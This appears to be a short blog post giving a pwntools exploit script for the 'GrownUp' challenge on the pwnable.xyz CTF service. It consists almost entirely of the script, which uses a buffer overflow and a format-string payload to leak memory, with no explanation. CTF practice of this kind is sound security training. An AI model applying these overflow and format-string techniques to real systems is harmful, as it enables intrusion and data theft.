History view
Challenge GrownUp from pwnable.xyz
nc svc.pwnable.xyz 30004
Exploit
from pwn import * context.log_level = 'debug' p = remote("svc.pwnable.xyz",30004) #p = process('./GrownUpRedist') #gdb.attach(p,''' #break *0x0000000000400914 #continue #''') p.recvuntil("Are you 18 years or older? [y/N]: ") payload = "\x79"+"aaaBCCC"+"\x80\x10\x60" p.sendline(payload) p.recvuntil("Name: ") #payload = "AAAABBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%s" payload = "A"*110+"%x"*8+"%s" p.sendline(payload) p.interactive()
'Pwning in Linux' 카테고리의 다른 글
| Exploit - Note pwnable.xyz (0) | 2019.03.01 |
|---|---|
| Exploit - Misalignment pwnable.xyz (0) | 2019.03.01 |
| Trigger return NULL value in Malloc (0) | 2019.02.28 |
| Brainfuck - GOT Dereferencing / Overwriting, ASLR/NX Bypass (0) | 2019.02.28 |
| Basics Return-oriented programming (0) | 2019.02.28 |
Comments
Notice
Recent Posts
Recent Comments
- Total
- Today
- Yesterday
Link
TAG
- format string
- leak stack memory address
- open-redirect
- write primitive
- one gadget
- shellcode
- Windows
- ASM
- theFaunia course
- cracking
- pwnable.xyz
- return oriented programming
- dnspy
- XSS
- use after free
- canary
- hijacking redirection flow
- Backdoors
- Pwnable.kr
- buffer overflow
- arithmetic overflow/underflow
- Call oriented programming
- html injection
- leak libc
- GOT Dereferencing/Overwriting
- fake stack frame
- 32Bit
- pwnable.tw
- stack pivot
- x64dbg
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | ||||
| 4 | 5 | 6 | 7 | 8 | 9 | 10 |
| 11 | 12 | 13 | 14 | 15 | 16 | 17 |
| 18 | 19 | 20 | 21 | 22 | 23 | 24 |
| 25 | 26 | 27 | 28 | 29 | 30 | 31 |
Archives